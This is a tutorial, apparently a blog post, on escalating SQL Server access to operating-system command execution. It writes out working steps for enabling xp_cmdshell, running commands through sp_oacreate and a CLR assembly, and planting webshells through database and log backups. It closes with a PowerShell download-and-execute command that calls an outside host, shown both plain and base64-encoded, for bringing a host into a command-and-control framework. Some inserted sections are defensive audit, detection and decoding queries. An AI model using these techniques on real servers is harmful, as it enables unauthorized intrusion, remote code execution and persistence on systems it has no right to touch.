SQL Server privilege escalation methods

Table of contents

Method of privilege escalation

xp_cmdshell executes system commands

sp_oacreate executes system commands

Execute system commands using the CLR

Database differential backup write webshell

Log differential backup write webshell

One-click RCE exploitation tool

SQL Server command execution: PowerShell online mode


See also, on SQL Server injection: SQL Server manual injection method


Privilege escalation (command execution) in SQL Server relies mainly on the stored procedures that ship with SQL Server. Goal: SQL Server privileges -> operating system (SYSTEM) privileges.

A stored procedure is a programmable function created and saved in the database: a set of precompiled T-SQL statements stored on the server. Stored procedures can be seen as the database's counterpart of object-oriented programming: they control how data is accessed (a stored procedure can be understood like a function call), and they are run with the EXECUTE command.

They fall into three categories: system stored procedures, extended stored procedures, and user-defined stored procedures.

  • System stored procedures are stored mainly in the master database, are prefixed with sp_, and can be called from any database without prefixing the database name;
  • Extended stored procedures are calls to functions in a dynamic link library (DLL), used mainly for communication between client and server or between clients. They are prefixed with xp_ and are used in the same way as system stored procedures;
  • User-defined stored procedures are stored procedures written by SQL Server users.

Method of privilege escalation

To execute system commands you first need privileges in the SQL Server database (usually sa), then use the stored procedures that ship with the database to escalate, from the initial SQL Server privileges to the ability to execute operating system commands.

xp_cmdshell executes system commands

xp_cmdshell lets a system administrator run a given command as if at a cmd prompt and returns the output as text. It is a very powerful extended stored procedure. xp_cmdshell is enabled by default in SQL Server 2000 and can execute system commands directly; in SQL Server 2005 and later it is disabled by default, so to use it you need the corresponding privileges of the sa account and must enable it with sp_configure.

In 2005, xp_cmdshell generally runs as SYSTEM, while in 2008 it mostly runs as NT AUTHORITY\NETWORK SERVICE.

1. Check whether the current login has sa (sysadmin) privileges; returns 1 if so

select is_srvrolemember('sysadmin')

2. Check whether xp_cmdshell exists: 1 means it exists, 0 means it does not

select count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'  

If the result is 0, xp_cmdshell has been removed; it can be reloaded with the following command.

dbcc addextendedproc("xp_cmdshell","xplog70.dll");

If even xplog70.dll has been deleted, it can be restored with the following command (unverified):

exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll';

3. Enable xp_cmdshell

If it returns OK, it succeeded.

--enable xp_cmdshell
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE
--disable xp_cmdshell
exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'xp_cmdshell',0;RECONFIGURE;

If it is not enabled, executing the command directly returns an error.

4. Execute system commands

exec xp_cmdshell 'whoami';
--or
EXEC master..xp_cmdshell 'whoami'

You will see that the current user is either NETWORK SERVICE or SYSTEM. This depends on the account chosen for the service during installation. NETWORK SERVICE is recommended: if the service runs as SYSTEM, an attacker is spared the work of escalating privileges, as shown in the figure:

If the "SQL Server Database Engine" service was set to the SYSTEM account during installation,

then commands run with SYSTEM privileges.

sp_oacreate executes system commands

When xp_cmdshell has been removed, the COM-related procedure sp_OACreate in SQL Server can be used to execute system commands. The principle: SQL Server provides procedures for accessing OLE objects, namely sp_oacreate and sp_oamethod, which can call OLE controls and so indirectly obtain a shell.

1. Use the following command to check whether sp_oacreate can be used to execute system commands; if the result is 0, it can be used.

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'

If SQL Server blocks access to procedure 'sys.sp_OACreate' of component 'Ole Automation Procedures', enable it with the following command:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;

2. Execute the command

Unlike xp_cmdshell, this returns no output. You can redirect the command's output to a file and then view it on the system, for example:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\test.txt' 

Can the type command then be used to view the file contents? No. As shown below, viewing the file contents returns no output; you can only log in to the system to view it.

Execute system commands using the CLR

Beginning with SQL Server 2005 (9.x), SQL Server integrates the common language runtime (CLR) components of the .NET Framework for Microsoft Windows. This means that stored procedures, triggers, user-defined types, user-defined functions, user-defined aggregates, and streaming table-valued functions can now be written in any .NET Framework language, including Microsoft Visual Basic .NET and Microsoft Visual C#.

This method is more cumbersome: the project code has to be written for the target and then compiled. Here, a precompiled assembly is used directly.

--1. Enable the MSSQL CLR feature; to import an unsafe assembly, the database must also be marked TRUSTWORTHY.
exec sp_configure 'show advanced options', 1;RECONFIGURE;Exec sp_configure 'clr enabled', 1;RECONFIGURE;ALTER DATABASE [master] SET TRUSTWORTHY ON;

--2. Import the assembly (execute separately)
CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 

--3. Create the stored procedure (execute separately)
CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;

--4. Execute a command
EXEC sp_cmdExec 'ipconfig';

--Remove the assembly
DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];
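The three techniques above (xp_cmdshell, sp_oacreate, CLR) each depend on a server option that is off by default. The following audit query is an added example, not part of the original post: it reports the state of those options, any database marked TRUSTWORTHY, user assemblies loaded with a non-SAFE permission set in the current database, and the account each SQL Server service runs as (which decides whether xp_cmdshell output runs as SYSTEM or NETWORK SERVICE). Run it as a sysadmin, in master, on the instance under review.

```sql
-- Added audit query (not from the original post). Server options that the
-- xp_cmdshell, sp_oacreate and CLR techniques require; value_in_use = 1 means on.
SELECT name,
       CAST(value_in_use AS INT) AS value_in_use,
       CASE WHEN CAST(value_in_use AS INT) = 1 THEN 'ENABLED' ELSE 'disabled' END AS state
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled', 'clr strict security');

-- TRUSTWORTHY ON together with 'clr enabled' is what lets an UNSAFE assembly
-- (the WarSQLKit step above sets it on master) load into that database.
-- msdb is TRUSTWORTHY by default, so it is excluded.
SELECT name AS database_name, is_trustworthy_on
FROM sys.databases
WHERE is_trustworthy_on = 1 AND name <> 'msdb';

-- User assemblies in the current database that are not SAFE; a CmdExec-style
-- procedure needs UNSAFE_ACCESS. Run in each database you want to check.
SELECT DB_NAME() AS database_name, name, permission_set_desc, create_date
FROM sys.assemblies
WHERE is_user_defined = 1 AND permission_set_desc <> 'SAFE_ACCESS';

-- Service account per SQL Server service (SQL Server 2008 R2 SP1 and later).
-- A Database Engine service running as LocalSystem means xp_cmdshell runs as SYSTEM.
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services;
```

The 'clr strict security' row only appears on SQL Server 2017 and later; on older versions the first query simply returns three rows.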

Database differential backup write webshell

Differential database backup to get a webshell. In SQL Server both dbo and sa have permission to back up databases, so the database can be backed up to an asp file, producing a small webshell through MSSQL's backup function. In practice, the absolute path of the website must be obtained first, and then the shell is written.

Prerequisites

  • Has db_owner permission
  • Knows the absolute path of the web directory

For convenience of demonstration, a PHP file is generated directly here, in two steps:

--step 1
create DATABASE Testdb;
--step 2
backup database Testdb to disk = 'c:\test2.bak';
use Testdb;
create table [dbo].[Testdb] ([cmd] [image]);
insert into Testdb(cmd) values(0x3c3f70687020706870696e666f28293b3f3e);
--3c3f70687020706870696e666f28293b3f3e is the hex encoding of <?php phpinfo();?>
backup database Testdb to disk='C:\\phpinfo.php' WITH DIFFERENTIAL,FORMAT;

This generates two files; phpinfo.php is the webshell.

Log differential backup write webshell

Whether it is a log backup or a differential backup, a one-line webshell is written during the backup process.

The requirement for a LOG backup is that the database has already been backed up and its recovery model is FULL, at least in 2008. The advantage of a log backup is that the resulting webshell file is very small.

create database Testdb      --create database Testdb
alter database Testdb set RECOVERY FULL;   --set the recovery model to FULL
create table cmd (a image);        --create table cmd with a single column a of type image
backup log Testdb to disk= 'C:\\1.php' with init;   --initial backup to the specified path
insert into cmd (a) values(0x3c3f70687020706870696e666f28293b3f3e);  --insert the one-line shell into table cmd (hex of <?php phpinfo();?>)
backup log Testdb to disk='C:\\phpinfo.php';   --back up the transaction log to the target file

This generates phpinfo.php.
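Both the differential-backup and the log-backup variants leave a record in msdb's backup history, which is the natural place to detect them. The following detection query is an added example, not part of the original post; the web-root path patterns are assumptions and should be adjusted to the server being reviewed.

```sql
-- Added detection query (not from the original post). msdb records every
-- BACKUP DATABASE / BACKUP LOG, including the ones above that wrote
-- phpinfo.php. Flag disk backups whose target is not a .bak/.trn file, or
-- that were written under a web root.
SELECT bs.backup_finish_date,
       bs.database_name,
       CASE bs.type WHEN 'D' THEN 'full'
                    WHEN 'I' THEN 'differential'
                    WHEN 'L' THEN 'log'
                    ELSE bs.type END AS backup_type,
       bs.user_name,             -- login that ran the BACKUP statement
       bmf.physical_device_name  -- file the backup was written to
FROM msdb.dbo.backupset AS bs
JOIN msdb.dbo.backupmediafamily AS bmf
  ON bs.media_set_id = bmf.media_set_id
WHERE bmf.device_type = 2                                   -- 2 = disk file
  AND (
        -- target extension is not a normal backup extension (.php, .asp, ...)
        RIGHT(bmf.physical_device_name, 4) NOT IN ('.bak', '.trn')
        -- or the target sits under a web root (assumed paths; adjust per server)
        OR bmf.physical_device_name LIKE '%\inetpub\%'
        OR bmf.physical_device_name LIKE '%\wwwroot\%'
        OR bmf.physical_device_name LIKE '%\htdocs\%'
      )
  AND bs.backup_finish_date >= DATEADD(day, -30, SYSDATETIME())
ORDER BY bs.backup_finish_date DESC;
```

Against the walkthrough above this returns the rows for C:\\1.php and C:\\phpinfo.php but not C:\test2.bak, and bs.user_name shows which login issued them.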

One-click RCE exploitation tool

Tool for exploiting MSSQL: GitHub - SafeGroceryStore/MDUT: MDUT - Multiple Database Utilization Tools

SQL Server command execution: PowerShell online mode

Usually, because of quoting problems, the PowerShell code entered cannot be executed as-is when the command runs, so it needs to be encoded first.

The PowerShell online (call-back) code is as follows:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.10.5:80/a'))"

Base64 encoding

The content "IEX ((new-object net.webclient).downloadstring('http://192.168.10.5:80/a'))" needs to be base64-encoded with PowerShell. Put it in $fileContent:

$fileContent = "IEX ((new-object net.webclient).downloadstring('http://192.168.10.5:80/a'))";$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent);$encodedCommand = [Convert]::ToBase64String($bytes);echo $encodedCommand

The final result is as follows:

powershell.exe -nop -w hidden -exec bypass -Enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4ANQA6ADgAMAAvAGEAJwApACkA

Enter the encoded command directly into the command execution box below, and the host comes online in CS.
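An -Enc argument is base64 over the UTF-16LE bytes of the script, which is why the decoder has to read the bytes as NVARCHAR rather than VARCHAR. The following is an added example, not part of the original post: it decodes the encoded command from above inside T-SQL, using the XML xs:base64Binary idiom, and flags the download-cradle pattern so that a defender reviewing captured xp_cmdshell arguments can triage them without leaving the database.

```sql
-- Added example (not from the original post): decode a PowerShell
-- -EncodedCommand (-Enc) value and check it for a download cradle.
-- The value below is the encoded command shown in this post.
DECLARE @enc VARCHAR(MAX) =
  'SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4ANQA6ADgAMAAvAGEAJwApACkA';

-- base64 -> raw bytes via the XML xs:base64Binary type, then reinterpret
-- the bytes as UTF-16LE text (NVARCHAR), which is what PowerShell encoded.
DECLARE @bytes VARBINARY(MAX) =
  CAST(N'' AS XML).value('xs:base64Binary(sql:variable("@enc"))', 'VARBINARY(MAX)');
DECLARE @decoded NVARCHAR(MAX) = CAST(@bytes AS NVARCHAR(MAX));

-- Simple triage: IEX / Invoke-Expression fed by a web download is the
-- cradle shape used above. LIKE is case-insensitive under the default collation.
SELECT @decoded AS decoded_command,
       CASE WHEN (@decoded LIKE '%IEX%' OR @decoded LIKE '%Invoke-Expression%')
             AND (@decoded LIKE '%downloadstring%' OR @decoded LIKE '%Net.WebClient%')
            THEN 'download cradle: investigate'
            ELSE 'no cradle pattern matched' END AS verdict;
```

For the value above, decoded_command is the IEX line shown earlier and verdict is 'download cradle: investigate'.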


Source: blog.csdn.net/qq_44159028/article/details/130845430